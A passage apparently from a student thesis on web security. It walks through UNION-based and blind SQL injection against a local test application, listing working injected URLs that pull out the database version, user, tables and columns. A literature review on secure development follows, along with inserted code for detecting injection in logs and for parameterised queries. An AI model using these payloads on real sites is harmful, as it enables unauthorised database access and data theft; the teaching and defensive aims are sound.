The comment is important for our query to work properly. Once we execute the above URL in the browser we will be able to see a numeric value in the page; let's say that we see the number 2 on the screen. That means column number 2 is the null column for this web link, and we can execute MySQL commands through this column (Mcallister, Kirda & Kruegel, 2008).

Figure 7 above is a snapshot of finding the null column in the BCS web application by performing a SQL injection attack.

3.3.2.6 Fetching Database Version Manually

To check the version of the database we can simply use @@version or the version() function. As discussed above, column number 2 is the null column, so we simply put this function in place of the number 2 in our exploitable URL (Shar & Tan, 2013).

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),3--

Figure 8 Buy Cut save Application Fetching Database Version

Figure 8 above is a snapshot of the experimental SQL injection query that exposed the database version in the category title column. It can be seen that when we put the exploitable URL into this web page we get the version of the database: the picture shows 5.6.16 as the database version.

If we get an error like "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then the convert(), hex() and unhex() functions can be used (Easttom, 2012).

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,convert(@@version using latin1),3--

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,unhex(hex(@@version)),3--

Either of these returns the MySQL version of the database.

3.3.2.7 Fetching Database name

To check the database name we use the database() function; to test this we replace the number 2 with database() and get something similar to the image below (Alanazi & Sarrab, 2011).

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,database(),3--

Figure 9 Buy Cut save Application Fetching Database Name

As can be seen from Figure 9, we replaced column number 2 with database() and got the name of the database, INFORMATION_SCHEMA.

3.3.2.8 Fetching User information

To find out which database user the application is using, we replace the number 2 with user() and get something like the image below (Oehlert, 2005):

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,user(),3--

Figure 10 Buy Cut save Application Fetching User Information

As we can see in Figure 10, by applying user() we got the user name root@localhost, which is the user accessing this database. This web application is running on a local host server.

3.3.2.9 Database, Table, and Column Enumeration

Once the database information enumeration has completed successfully, the next step is to get the list of database tables and column names. In this topic we will understand how the column and table names of the database can be enumerated if the web application suffers from a SQL injection vulnerability (Alanazi & Sarrab, 2011).

Enumerating Table Name for MySQL version <5:

Now that we have the version, we enumerate the database table and column names. If the MySQL version is < 5 (i.e. 4.1.33, 4.1.12, ...) we must guess the table and column names in most cases. Common table names are: users, admin, member, ...; common column names are: username, user, user_name, password, pass, passwd, pwd etc.

If instead the MySQL version is 5, the guessing method above is not needed and we can use the following method. For this we need the database name, which we already obtained using database(). We can use the information_schema database to find the table names: to get tables we use table_name from information_schema.tables (Howard, LeBlanc & Viega, 2010).

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables--

Here we replace the number 2 with table_name to get the first table from information_schema.tables, displayed on the screen below.

Figure 11 Buy Cut save Application Database, Table and Column Enumeration

As can be seen from Figure 11, we got the name of the first table, CHARACTER_SET, which is in the information_schema database. We can add LIMIT to the end of the query to list out all tables (Ringgold & Portland, 2012).

3.3.2.10 Enumerating Column

Now we want to get the column names of a particular database. We use column_name from information_schema.columns to get the column names.

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns--

Here we replace the number 2 with column_name to get the first column name from information_schema.columns, displayed on the screen below. We can add LIMIT to the end of the query to list out all columns.

Figure 12 Buy Cut save Application Enumerating Column

As we can see from the example given in Figure 12, by using column_name we got the name of a column in the information_schema database.

3.3.2.11 Dumping Database

The database dumping process can start only once we have the column information. The next task of the penetration tester is to enumerate the information inside the columns of the table. The database holds all the information, such as passwords and user information, and the penetration tester tries to dump this information using these techniques (Howard, LeBlanc & Viega, 2010).

Now, to read the column contents, we use the table name and the column name in the URL. Once we execute the URL as defined below, we receive the information that exists in the defined column.

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,CHARACTER_SET_NAME,3+from+CHARACTER_SETS--

In this way we can use the MySQL URL method to carry out a SQL injection attack, and as we saw in the example of the BCS PREDICTION web application, we can obtain all the database information using this method.

Below is a snapshot of the database dumped using the MySQL URL method.

Figure 13 Buy Cut save Application Dumping Database

As we can see in Figure 13, I found the database name, table names, column names and all the information in the database by using the MySQL URL method SQL injection technique.

3.3.3 SQL Injection in MySQL by Blind Injection Method:

Blind injection is a little more complicated than URL injection, but it can be

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1

This time, when we use the above URL, the page loads normally; now let's check whether it is vulnerable to blind injection.

3.3.3.1 Vulnerability Checking In Blind Sql Injection

Put AND 1=1 after the id value in the URL. The page loads normally because this condition is always true.

For example

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%201=1

Condition is true:

Figure 14 Buy Cut save Application Blind SQL Injection Checking

Figure 14 above illustrates checking for the blind injection vulnerability by passing values in the URL. No change can be seen in the snapshot given in Figure 14 after passing this condition in the URL.

Now change 1=1 to 1=2, which is false, and see what happens.

For example

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%201=2

If some text, picture or other content is missing from the returned page, the site is vulnerable to blind SQL injection. We can see in the snapshot below that when the condition is false, "CATEGORY OF TYPE" shows "Category Title" instead of "BEEF".

Figure 15 Buy Cut save Application Blind SQL Injection Checking

Now, as we can see in Figure 15, the site is vulnerable to blind SQL injection, so we next get the MySQL version. To get the version in a blind attack we use the substring function: we use true and false conditions with the version function to check whether the version of the database is 5 or 4.

3.3.3.2 Getting Version in MySQL Database

In blind SQL injection the database version is obtained with the substring function and @@version.

For example:

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)= 5--+-%E2%80%99

This returns TRUE if the version of MySQL is 5: if the database version is 5, the condition is true and the page loads normally.

Figure 16 Buy Cut save Application Getting Version in MySQL Database

In Figure 16, I replaced 5 with 4; if the database version is 5, this condition is false.

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)= 4--+-%E2%80%99

As identified in Figure 17, after passing this query some pictures or icons in the web page change. We can see from the snapshot below that the Category Title has changed.

3.3.3.3 Enumerating table name from the current database:

In blind injection we have to guess the table name with a condition. If the condition is true, the page loads normally.

We try different table names, as given below in Figures 18, 19 and 20:

(1) Passwords

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20passwords%20limit%200,1)=1--+-

(We got an error.)

Figure 18 Buy Cut save Application Enumerating Name from Database

(2) Users

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20users%20limit%200,1)=1--+-

Figure 19 Buy Cut save Application Enumerating Name from Database

(3) Admin

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20admin%20limit%200,1)=1--+-

(The page loads normally, which means the condition is true: the database has a table named "admin".)

Figure 20 Buy Cut save Application Enumerating Name from Database

3.3.3.4 Enumerating Column Name:

Now we do the same as for the table name: we start guessing. As said before, try the common names for columns.

(1) User id

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substring(concat(1,userid),1,1)%20from%20admin%20limit%200,1)=1--+-

If the page loads normally we know that there is a column named userid in the admin table (if the condition is false, try other common names or just guess). In Figure 21 below, we can see that we got an error, which means there is no userid column in the admin table.

Figure 21 Buy Cut save Application Enumerating Column Name

(2) Admin_id

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substring(concat(1,admin_id),1,1)%20from%20admin%20limit%200,1)=1--+-

Figure 22 Buy Cut save Application Enumerating Column Name

As we can see in Figure 22, the page loads normally, which means there is a column named admin_id in the admin table. In this way, using blind SQL injection techniques, we dump the database.
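The attack characters in the table of section 3.2 and the URL probes of sections 3.3.2 and 3.3.3 (quotes, comment markers, ORDER BY counting, UNION SELECT, version()/@@version, information_schema, substring-based blind tests) are also what a defender should look for in server logs. The following is an added example, not code from the thesis or the BCS application, that scans access-log lines for those markers; the log lines are constructed and the rule names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (assumed format: Apache common log); the query
# strings mirror the probes described in this chapter. Not real BCS traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2021:10:00:01 +0930] "GET /bcs/admin/category_form.php?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2021:10:00:02 +0930] "GET /bcs/admin/category_form.php?id=1' HTTP/1.1" 500 233
127.0.0.1 - - [01/Jan/2021:10:00:03 +0930] "GET /bcs/admin/category_form.php?id=1+order+by+4-- HTTP/1.1" 500 233
127.0.0.1 - - [01/Jan/2021:10:00:04 +0930] "GET /bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),3-- HTTP/1.1" 200 540
127.0.0.1 - - [01/Jan/2021:10:00:05 +0930] "GET /bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)=5--+- HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2021:10:00:06 +0930] "GET /bcs/search.php?publisher=XYZ HTTP/1.1" 200 900
127.0.0.1 - - [01/Jan/2021:10:00:07 +0930] "GET /bcs/search.php?publisher=XYZ'+or+1=1-- HTTP/1.1" 200 9000
"""

# Each rule is (name, pattern) and is applied to the URL-decoded parameter
# value, so %20 / + encoding does not hide the marker.
RULES = [
    ("quote", re.compile(r"['\"]")),
    ("comment", re.compile(r"--|#|/\*")),
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("union", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("db_function", re.compile(r"@@version|\b(version|database|user)\s*\(\s*\)", re.I)),
    ("schema", re.compile(r"information_schema", re.I)),
    ("blind_probe", re.compile(r"\bsubstring\s*\(", re.I)),
]

LOG_RE = re.compile(r'"(?P<method>GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_request(target):
    """Return the sorted list of rule names triggered by one request target
    (path plus query string). Only parameter values are inspected."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)


def scan_log(text):
    """Return (target, status, hits) for every log line that triggers a rule.
    The status is kept because error-based probes typically show up as 500s."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = scan_request(m.group("target"))
        if hits:
            findings.append((m.group("target"), int(m.group("status")), hits))
    return findings


if __name__ == "__main__":
    for target, status, hits in scan_log(SAMPLE_LOG):
        print(status, ", ".join(hits), "<-", target)
```

Five of the seven constructed lines are flagged; the two plain requests (id=1 and publisher=XYZ) pass untouched, which is the property to preserve when tuning such rules against real traffic.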

V. Literature review on web security practices

5.1 History of web application security fields and practice

When web applications were introduced in 1990, the web was a general delivery mechanism. It has since transformed from a medium for static hypertext documents into a complete dynamic run-time environment for multi-party and distributed applications. Web technologies have progressively moved from a centralised server technology to interaction models and a dynamic client model. The emerging trend became popular in peer-to-peer web applications and multiple applications. But the transformation of the web application away from the server-centric model creates significant and numerous challenges in web application security (Alanazi & Sarrab 2011). In the past decade it was not possible to make web applications client-centric. This serves as motivation for the need for compact security of web applications.

Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au, 2015)

[Figure 23 timeline: first web server and browser introduced; W3C; PHP 1.0 & Apache released; IIS 1.0 released on Windows NT; Live (Java) Script, MySQL and IE1 released; OWASP started; ASP.Net 1.0 released; SQL Slammer worm started; work started on HTML5; Samy worm released; AJAX term proposed; web vulnerability scanner introduced; web application hacking arrives. Side labels: "Infinite Coding Errors", "Development Issue".]

Figure 23 above explains the development of the web server and the languages that took web applications into the world market. After the introduction of the web server and browser, continuous development started, and since the web is a service in transformation, its security concerns started along with its progress. The year 1995 was a year of new achievements in the area of web development, when lots of new things were discovered. In late 1994 the W3C was introduced. PHP 1.0 and the Apache server were introduced in 1995 (Alanazi & Sarrab 2011). Microsoft released its software for web development, named IIS, and Internet Explorer 1 was also introduced. Some methodologies were worked out for the security of web applications at the initial level of development.

Fine-grained access control: These are the policies that define how the application's authentication process works and how the application authorizes end users. In the beginning of web applications, security was simple: web application frameworks checked it, and simple sequences maintained the application's integrity. There was a series of questions about the foundation of the authentication process, and protocols limited the feasibility of authentication features such as secure session management (Alanazi & Sarrab 2011).

Information-flow control: This specifies the security of sensitive data, trust domains, data integration, and client-side and server-side information processing. Initially in web development, an organisation's policies were the basis for the security policy of a web application. Information-flow policies involved individuals with possibly differing goals. At that time, tracking end-to-end information and its flow in web applications could not be worked out, and it was left to end-user review. Information-flow control policies are a set of mechanisms practically implemented in a web setting.

Secure composition: In the beginning, security was applied in the code of web applications; in short, the code alone was responsible for the security of a web application. Traditional HTML fails to deliver both the interaction and the security needs. Security is a composition of interaction and separation.

Cross-domain interaction: The original and still unresolved problem of the last decade in web development is the inherent incompatibility that lies in the cross-domain nature of the hyperlink. In the past, the situation was even more complex. Nowadays, JavaScript plays an important role in securing the web application, from its birth in web application development; this scripting language is formalizing its semantics. Now HTML5 also comes with lots of security features for various threats regarding web applications (Desme and Johns, n.d.).

5.2 Web security design with software engineering

Most applications are developed with software engineering models that help in the management of resources. Organisations are not fully aware of security issues, which were not considered a serious element in the development life cycle.

Organisations manage the security of an application through separate processes to meet requirements. Meanwhile the SDLC provides options for the security of an application: security services can be implemented within each phase of the development life cycle (Meier, 2006).

Figure 24 Security in SDLC Process (SANS Institute, 2007)

Figure 24 explains security in the SDLC, defining the techniques that represent the secure software development process.

5.2.1 Security Requirements

To find out the requirements, the first step is to classify the application. At the beginning of application development, the level of security expected for the software is determined. The application is categorized on the basis of its usage, the sensitivity of its data, the technology to be used and the application type, i.e. web-based or non-web-based. This helps set the level required for the application: low, medium or high (SANS Institute, 2007).

(49)

50 5.2.2 Secure Application Design and threat modelling

It is need to concern about web application security and the potential vulnerabilities which may mitigates the application if it is not designed in security measures. In an architectural level of web application, surface area of attacks must be measured. The design must be based on the assumptions and researched potential threats (Nahari, Krutz, & Books24x7, 2011). In the formal application security requirements and specification are combined. This activity of phase is called threat modelling. It helps in understanding of possible threats for the application. The threat modelling includes the application components definitions, segmentations of applications, and finds dependencies (internal and external). It is necessary to resolve the possible issues. At last of the phase, the finalise design is reviewed from security point of view. There are also some vulnerability techniques and modelling tools are used for threat analysis. Some of the common threats include loss of sensitive data, denial of the service, unauthorized access etc.

Common threats include loss of confidential data, unauthorised access, and denial of service attacks. It is necessary to identify all illegal actions that could be carried out against the application and the attack actions behind them. This helps in diminishing the risks associated with malicious use of the system. The response to each identified risk can be to eliminate the risk, to reduce the risk, or to accept the risk.

5.2.3 Develop with Secure Coding

It is well known that most security bugs are introduced into an application during the development phase. In this phase the occurrence of security issues depends on the coding conventions, the coding standard, the choice of language, the development environment, the security baselines, the data handling methods, the integration with external applications, and the implementation of security features. A coding standard needs to be established to secure the application. Many techniques are available for different technologies to write code in a secure manner, and these techniques must be applied in order to avoid security issues and coding errors.

Hence, the vital point is that these practices are applied in the code of all application modules, so that bugs are found in the early phases of development rather than in code that has already been released.
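
As an added illustration of the secure coding and data handling practices discussed above (this example is not part of the thesis and is not taken from any cited source), the following Python code shows the same database lookup written twice: once with string concatenation, which lets user input be parsed as part of the SQL statement, and once with a parameterised query, which always binds the input as data. A small development-phase check, of the kind a team would run before code is set for distribution, is applied to both versions so that the defect is caught early. The table, its rows, the function names and the allowlist pattern are all constructed for this example; only the standard library (sqlite3, re) is used.

```python
"""Added example: unsafe vs. parameterised SQL lookup with a development-phase
self-check. All names, table contents and the allowlist are constructed for
illustration; they are not the thesis's own code."""
import re
import sqlite3

# Constructed allowlist for usernames: letters, digits, underscore, dot,
# hyphen and apostrophe (so names such as o'neil remain valid), 1-32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.'-]{1,32}")


def is_valid_username(username: str) -> bool:
    """Input validation as defence in depth: reject anything outside the
    allowlist before it reaches the database layer."""
    return bool(USERNAME_RE.fullmatch(username))


def build_db() -> sqlite3.Connection:
    """Create a constructed in-memory users table with three sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("o'neil", "user")],
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable pattern: the caller's input is spliced into the SQL text, so
    the database parses it as part of the statement rather than as a value."""
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened pattern: a placeholder is used and the value is bound
    separately, so it is always treated as a literal string."""
    query = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def lookup_check(lookup) -> dict:
    """Development-phase check that can be applied to either implementation.

    Returns a dict of findings; an empty dict means the lookup behaved
    correctly on two inputs that commonly expose injection defects.
    """
    conn = build_db()
    findings = {}
    # 1. A legitimate value containing a quote must still be looked up
    #    correctly instead of breaking the statement.
    try:
        rows = lookup(conn, "o'neil")
        if rows != [("o'neil", "user")]:
            findings["quote_in_name"] = rows
    except sqlite3.Error as exc:
        findings["quote_in_name"] = repr(exc)
    # 2. A value that would read as a tautology if parsed as SQL must not
    #    widen the result beyond the single matching user (here: none).
    try:
        rows = lookup(conn, "' OR '1'='1")
        if len(rows) > 1:
            findings["tautology"] = len(rows)
    except sqlite3.Error as exc:
        findings["tautology"] = repr(exc)
    conn.close()
    return findings


if __name__ == "__main__":
    print("unsafe findings:", lookup_check(find_user_unsafe))
    print("safe findings:  ", lookup_check(find_user_safe))
```

Run against the concatenating version, the check reports a database error for the legitimate name and a result set of three rows for the tautology, which is exactly the symptom a reviewer should treat as an injection defect; the parameterised version produces no findings. The allowlist validator is a second, independent layer: it accepts the legitimate name but rejects the tautology input because of its spaces and equals signs, and it should be used in addition to, never instead of, parameterised queries.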

5.2.4 Application Security Testing

Importance and cost increase with the completion of each phase of the development life cycle model. Thus a test strategy needs to be made for every phase. Testing of each phase

References
